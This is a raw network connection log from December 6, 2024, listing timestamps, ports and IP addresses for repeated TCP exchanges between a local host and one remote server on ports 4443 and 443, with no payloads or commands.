Dec 6, 2024 22:14:41.116110086 CET	50116	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:41.236157894 CET	4443	50116	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:41.236241102 CET	50116	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:41.393151045 CET	50117	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:41.512996912 CET	4443	50117	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:41.513245106 CET	50117	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:41.528264999 CET	50117	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:41.648390055 CET	4443	50117	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:42.968615055 CET	4443	50117	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:42.970441103 CET	50117	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:43.090560913 CET	4443	50117	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:43.090713024 CET	50117	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:43.100713015 CET	50118	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:43.220526934 CET	4443	50118	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:43.220611095 CET	50118	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:43.226475000 CET	50118	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:43.346263885 CET	4443	50118	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:44.669877052 CET	4443	50118	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:44.671750069 CET	50118	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:44.792346001 CET	4443	50118	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:44.792443991 CET	50118	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:44.804191113 CET	50119	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:44.924048901 CET	4443	50119	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:44.924206972 CET	50119	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:44.925796986 CET	50119	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:45.045625925 CET	4443	50119	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:46.368662119 CET	4443	50119	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:46.370229006 CET	50119	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:46.490421057 CET	4443	50119	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:46.490541935 CET	50119	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:46.507586956 CET	50120	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:46.627358913 CET	4443	50120	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:46.627500057 CET	50120	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:46.634361982 CET	50120	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:46.754348993 CET	4443	50120	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:48.086716890 CET	4443	50120	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:48.088707924 CET	50120	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:48.219130993 CET	4443	50120	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:48.221913099 CET	50120	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:48.227507114 CET	50121	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:48.347256899 CET	4443	50121	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:48.349921942 CET	50121	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:48.351504087 CET	50121	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:48.471184969 CET	4443	50121	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:49.829993963 CET	4443	50121	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:49.831805944 CET	50121	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:49.951770067 CET	4443	50121	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:49.951884985 CET	50121	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:49.976218939 CET	50122	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:50.122067928 CET	4443	50122	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:50.122138977 CET	50122	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:50.124015093 CET	50122	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:50.361901999 CET	4443	50122	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:51.619035959 CET	4443	50122	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:51.620732069 CET	50122	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:51.741255045 CET	4443	50122	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:51.741354942 CET	50122	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:51.758333921 CET	50123	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:51.880680084 CET	4443	50123	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:51.880764008 CET	50123	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:51.882236004 CET	50123	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:52.002057076 CET	4443	50123	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:53.333367109 CET	4443	50123	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:53.335413933 CET	50123	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:53.455730915 CET	4443	50123	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:53.455809116 CET	50123	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:53.474786043 CET	50124	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:53.594659090 CET	4443	50124	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:53.594760895 CET	50124	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:53.596358061 CET	50124	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:53.716960907 CET	4443	50124	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:55.059056997 CET	4443	50124	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:55.060920954 CET	50124	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:55.185340881 CET	4443	50124	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:55.185439110 CET	50124	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:55.209903955 CET	50125	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:55.332400084 CET	4443	50125	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:55.332540035 CET	50125	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:55.334173918 CET	50125	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:55.454063892 CET	4443	50125	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:56.779381037 CET	4443	50125	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:56.781443119 CET	50125	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:56.901787996 CET	4443	50125	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:56.901987076 CET	50125	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:56.911722898 CET	50126	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:57.031492949 CET	4443	50126	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:57.031601906 CET	50126	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:57.033041000 CET	50126	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:57.152746916 CET	4443	50126	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:58.510720015 CET	4443	50126	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:58.512492895 CET	50126	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:58.633621931 CET	4443	50126	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:58.633732080 CET	50126	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:58.648906946 CET	50127	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:58.768676043 CET	4443	50127	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:58.768749952 CET	50127	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:58.770342112 CET	50127	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:58.891184092 CET	4443	50127	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:00.219690084 CET	4443	50127	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:00.221451044 CET	50127	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:00.341703892 CET	4443	50127	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:00.341794968 CET	50127	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:00.367026091 CET	50128	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:00.486809015 CET	4443	50128	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:00.486886978 CET	50128	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:00.488408089 CET	50128	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:00.610213041 CET	4443	50128	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:01.977852106 CET	4443	50128	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:01.979437113 CET	50128	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:02.099622965 CET	4443	50128	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:02.099776983 CET	50128	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:02.116164923 CET	50129	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:02.236046076 CET	4443	50129	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:02.236119986 CET	50129	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:02.237783909 CET	50129	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:02.357593060 CET	4443	50129	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:03.694930077 CET	4443	50129	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:03.696542978 CET	50129	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:03.816900015 CET	4443	50129	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:03.819880009 CET	50129	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:03.835006952 CET	50130	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:03.955537081 CET	4443	50130	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:03.955619097 CET	50130	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:03.957422018 CET	50130	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:04.077167988 CET	4443	50130	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:05.484972954 CET	4443	50130	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:05.489469051 CET	50130	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:05.631567001 CET	50131	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:05.638020039 CET	4443	50130	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:05.639817953 CET	50130	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:05.751425982 CET	4443	50131	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:05.752042055 CET	50131	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:05.753508091 CET	50131	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:05.873235941 CET	4443	50131	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:07.202811003 CET	4443	50131	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:07.228266954 CET	50131	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:07.350960016 CET	4443	50131	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:07.353996038 CET	50131	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:07.395416975 CET	50132	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:07.515223026 CET	4443	50132	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:07.515317917 CET	50132	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:07.516829967 CET	50132	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:07.636524916 CET	4443	50132	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:07.674201012 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:07.674249887 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:07.674352884 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:07.692471981 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:07.692486048 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.017153978 CET	4443	50132	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.021542072 CET	50132	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:09.141633034 CET	4443	50132	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.143894911 CET	50132	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:09.163825035 CET	50134	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:09.166980028 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.167088032 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:09.172760963 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:09.172770023 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.173046112 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.175894976 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:09.179425955 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:09.223345995 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.283979893 CET	4443	50134	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.284208059 CET	50134	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:09.285686016 CET	50134	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:09.405302048 CET	4443	50134	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.834727049 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.834757090 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.834856033 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:09.834883928 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:09.834932089 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.067157030 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.067167997 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.067209005 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.067245007 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.067260981 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.067279100 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.067303896 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.124723911 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.124742985 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.124803066 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.124814987 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.124855042 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.223959923 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.223988056 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.224047899 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.224057913 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.224081039 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.224102020 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.285183907 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.285208941 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.285263062 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.285270929 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.285317898 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.285340071 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.335165024 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.335187912 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.335287094 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.335297108 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.335371971 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.382015944 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.382038116 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.382159948 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.382167101 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.382216930 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.439769030 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.439795017 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.440041065 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.440048933 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.440119028 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.503196001 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.503217936 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.503309011 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.503320932 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.503367901 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.516050100 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.516067982 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.516164064 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.516170025 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.516213894 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.553767920 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.553788900 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.553858995 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.553869009 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.553910971 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.553930998 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.565421104 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.565443039 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.565490007 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.565495014 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.565526009 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.565550089 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.581063986 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.581082106 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.581168890 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.581175089 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.581248999 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.593856096 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.593871117 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.593987942 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.593993902 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.594060898 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.645453930 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.645473003 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.645626068 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.645636082 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.645678997 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.663551092 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.663567066 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.663717031 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.663728952 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.663778067 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.698888063 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.698905945 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.699011087 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.699017048 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.699060917 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.707784891 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.707801104 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.707886934 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.707892895 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.707937956 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.747940063 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.747962952 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.748089075 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.748097897 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.748152971 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.756346941 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.756361008 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.756474018 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.756479025 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.756525040 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.771883965 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.771904945 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.771945953 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.771950960 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.771977901 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.771996975 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.778670073 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.778685093 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.778716087 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.778754950 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.778759003 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.778798103 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.834326982 CET	4443	50134	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.851392031 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.851409912 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.851449013 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.851458073 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.851495028 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.851511002 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.857747078 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.857759953 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.857842922 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.857851028 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.857894897 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.889110088 CET	50134	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.891109943 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.891129971 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.891195059 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.891211987 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.891257048 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.898312092 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.898334026 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.898430109 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.898436069 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.898478985 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.938493967 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.938513041 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.938616991 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.938625097 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.938667059 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.943701029 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.943726063 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.943766117 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.943770885 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.943834066 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.943834066 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.960943937 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.960968018 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.961018085 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.961025953 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.961095095 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.967288017 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.967305899 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.967379093 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.967386961 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:10.967402935 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:10.967436075 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:11.043649912 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.043687105 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.043740988 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:11.043751955 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.043786049 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:11.043803930 CET	50133	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:15:11.049603939 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.049621105 CET	443	50133	185.234.216.175	192.168.2.4
Dec 6, 2024 22:15:11.049673080 CET	50133	443	192.168.2.4	185.234.216.175
